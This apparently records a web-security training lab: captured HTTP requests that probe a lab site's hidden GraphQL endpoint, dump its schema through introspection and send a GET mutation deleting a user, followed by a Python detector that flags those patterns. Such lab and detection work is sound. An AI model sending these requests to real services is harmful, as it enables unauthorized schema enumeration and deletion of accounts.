Lab: Finding a hidden GraphQL endpoint
https://portswigger.net/web-security/learning-paths/graphql-api-vulnerabilities/bypassing-graphql-introspection-defenses/graphql/lab-graphql-find-the-endpoint#
GET /api?query=query{__typename} HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0

GET /api?query=query+IntrospectionQuery+%7b%0a++++__schema%0a+%7b%0a++++++++queryType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++mutationType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++subscriptionType+%7b%0a++++++++++++name%0a++++++++%7d%0a++++++++types+%7b%0a++++++++++++...FullType%0a++++++++%7d%0a++++++++directives+%7b%0a++++++++++++name%0a++++++++++++description%0a++++++++++++locations%0a++++++++++++args+%7b%0a++++++++++++++++...InputValue%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%7d%0a%0afragment+FullType+on+__Type+%7b%0a++++kind%0a++++name%0a++++description%0a++++fields%28includeDeprecated%3a+true%29+%7b%0a++++++++name%0a++++++++description%0a++++++++args+%7b%0a++++++++++++...InputValue%0a++++++++%7d%0a++++++++type+%7b%0a++++++++++++...TypeRef%0a++++++++%7d%0a++++++++isDeprecated%0a++++++++deprecationReason%0a++++%7d%0a++++inputFields+%7b%0a++++++++...InputValue%0a++++%7d%0a++++interfaces+%7b%0a++++++++...TypeRef%0a++++%7d%0a++++enumValues%28includeDeprecated%3a+true%29+%7b%0a++++++++name%0a++++++++description%0a++++++++isDeprecated%0a++++++++deprecationReason%0a++++%7d%0a++++possibleTypes+%7b%0a++++++++...TypeRef%0a++++%7d%0a%7d%0a%0afragment+InputValue+on+__InputValue+%7b%0a++++name%0a++++description%0a++++type+%7b%0a++++++++...TypeRef%0a++++%7d%0a++++defaultValue%0a%7d%0a%0afragment+TypeRef+on+__Type+%7b%0a++++kind%0a++++name%0a++++ofType+%7b%0a++++++++kind%0a++++++++name%0a++++++++ofType+%7b%0a++++++++++++kind%0a++++++++++++name%0a++++++++++++ofType+%7b%0a++++++++++++++++kind%0a++++++++++++++++name%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%7d HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0

GET /api?query=mutation%28%24input%3a+DeleteOrganizationUserInput%29+%7b%0a++deleteOrganizationUser%28input%3a+%24input%29+%7b%0a++++user+%7b%0a++++++id%0a++++++username%0a++++%7d%0a++%7d%0a%7d&variables=%7b%22input%22%3a%7b%22id%22%3a3%7d%7d HTTP/2
Host: 0a8d00b603fd88038283933e007d00e6.web-security-academy.net
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: session=l0s2k3S2dl12443QTmAEa1lSCgduNCXs
Upgrade-Insecure-Requests: 1
Referer: https://0a8d00b603fd88038283933e007d00e6.web-security-academy.net/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
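As an added example (not part of this lab write-up), a small Python detector a defender could run over access-log or proxy request lines to flag the three patterns captured above: a __typename probe, a full introspection query, and a mutation carried in a GET query string. The first and third sample lines reuse the captured requests; the abbreviated introspection query and the benign lines are constructed for contrast.

```python
"""Flag GraphQL introspection probes and mutations sent over GET; added example, not lab code."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: lines 1 and 3 are the captured requests above, line 2 abbreviates the
# captured introspection query, and the last two are hypothetical benign traffic for contrast.
SAMPLE_LINES = [
    "GET /api?query=query{__typename} HTTP/2",
    "GET /api?query=query+IntrospectionQuery+%7b__schema+%7b+queryType+%7b+name+%7d+%7d+%7d HTTP/2",
    "GET /api?query=mutation%28%24input%3a+DeleteOrganizationUserInput%29+%7b%0a++deleteOrganizationUser%28input%3a+%24input%29+%7b%0a++++user+%7b%0a++++++id%0a++++++username%0a++++%7d%0a++%7d%0a%7d&variables=%7b%22input%22%3a%7b%22id%22%3a3%7d%7d HTTP/2",
    "GET /api?query=query+%7b+getProduct%28id%3a+1%29+%7b+name+%7d+%7d HTTP/2",
    "GET /resources/js/app.js HTTP/2",
]


def classify_request_line(line: str) -> dict:
    """Return a findings dict for one 'METHOD /path?qs HTTP/x' line, or {} if nothing is flagged."""
    parts = line.split()
    if len(parts) < 2:
        return {}
    method, target = parts[0], parts[1]
    url = urlsplit(target)
    params = parse_qs(url.query)                 # decodes %xx and '+' for us
    query = params.get("query", [""])[0]
    if not query:
        return {}
    flags = []
    if re.search(r"\b__(schema|type)\b", query):
        flags.append("introspection")            # schema enumeration: the high-signal case
    elif re.search(r"\b__typename\b", query):
        flags.append("typename-probe")           # cheap "is this GraphQL?" check; low severity alone
    op = re.match(r"\s*(query|mutation|subscription)\b", query)
    operation = op.group(1) if op else "query"   # shorthand '{ ... }' is a query
    if operation == "mutation" and method == "GET":
        flags.append("mutation-over-GET")        # state change on a cacheable, CSRF-prone verb
    if not flags:
        return {}
    top = re.search(r"\{\s*([A-Za-z_]\w*)", query)   # first selected field, e.g. the mutation name
    variables = params.get("variables", [""])[0]
    return {"method": method, "path": url.path, "operation": operation,
            "top_field": top.group(1) if top else None,
            "variables": json.loads(variables) if variables else None, "flags": flags}


def scan(lines):
    """Run the classifier over many request lines, keeping only the flagged ones."""
    return [f for f in (classify_request_line(l) for l in lines) if f]


FINDINGS = scan(SAMPLE_LINES)   # three flagged requests out of the five sample lines
```

The __typename hit on its own is only a hint that someone is probing for a GraphQL endpoint; the introspection and mutation-over-GET flags are the ones worth alerting on, and the decoded top_field and variables give the responder the operation and record involved.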